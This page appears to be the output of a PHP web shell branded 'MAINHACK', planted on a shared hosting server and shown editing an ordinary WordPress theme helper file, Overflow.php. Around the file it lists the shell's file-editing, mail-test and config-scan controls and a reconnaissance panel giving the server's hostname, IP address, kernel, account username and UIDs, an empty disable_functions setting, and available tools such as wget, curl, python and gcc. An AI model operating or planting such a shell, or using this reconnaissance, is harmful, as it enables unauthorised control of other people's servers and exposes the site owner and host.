[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Overflow.php
<?php if ( ! defined( 'ABSPATH' ) ) { die( 'Direct access forbidden.' ); } /** * Overflow helper methods * * Class ET_Builder_Module_Helper_Overflow */ class ET_Builder_Module_Helper_Overflow { const OVERFLOW_DEFAULT = ''; const OVERFLOW_VISIBLE = 'visible'; const OVERFLOW_HIDDEN = 'hidden'; const OVERFLOW_SCROLL = 'scroll'; const OVERFLOW_AUTO = 'auto'; private static $instance; public static function get() { if ( empty( self::$instance ) ) { return self::$instance = new self(); } return self::$instance; } /** * Returns overflow settings X axis field * * @param string $prefix * * @return string */ public function get_field_x( $prefix = '' ) { return $prefix . 'overflow-x'; } /** * Returns overflow settings Y axis field * * @param string $prefix * * @return string */ public function get_field_y( $prefix = '' ) { return $prefix . 'overflow-y'; } /** * Return overflow X axis value * * @param array $props * @param mixed $default * @param string $prefix * * @return string */ public function get_value_x( $props, $default = null, $prefix = '' ) { return et_()->array_get( $props, $this->get_field_x( $prefix ), $default ); } /** * Return overflow Y axis value * * @param array $props * @param mixed $default * @param string $prefix * * @return string */ public function get_value_y( $props, $default = null, $prefix = '' ) { return et_()->array_get( $props, $this->get_field_y( $prefix ), $default ); } /** * Returns overflow valid values * * @return array */ public function get_overflow_values() { return array( self::OVERFLOW_DEFAULT, self::OVERFLOW_VISIBLE, self::OVERFLOW_HIDDEN, self::OVERFLOW_AUTO, self::OVERFLOW_SCROLL, ); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.65 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830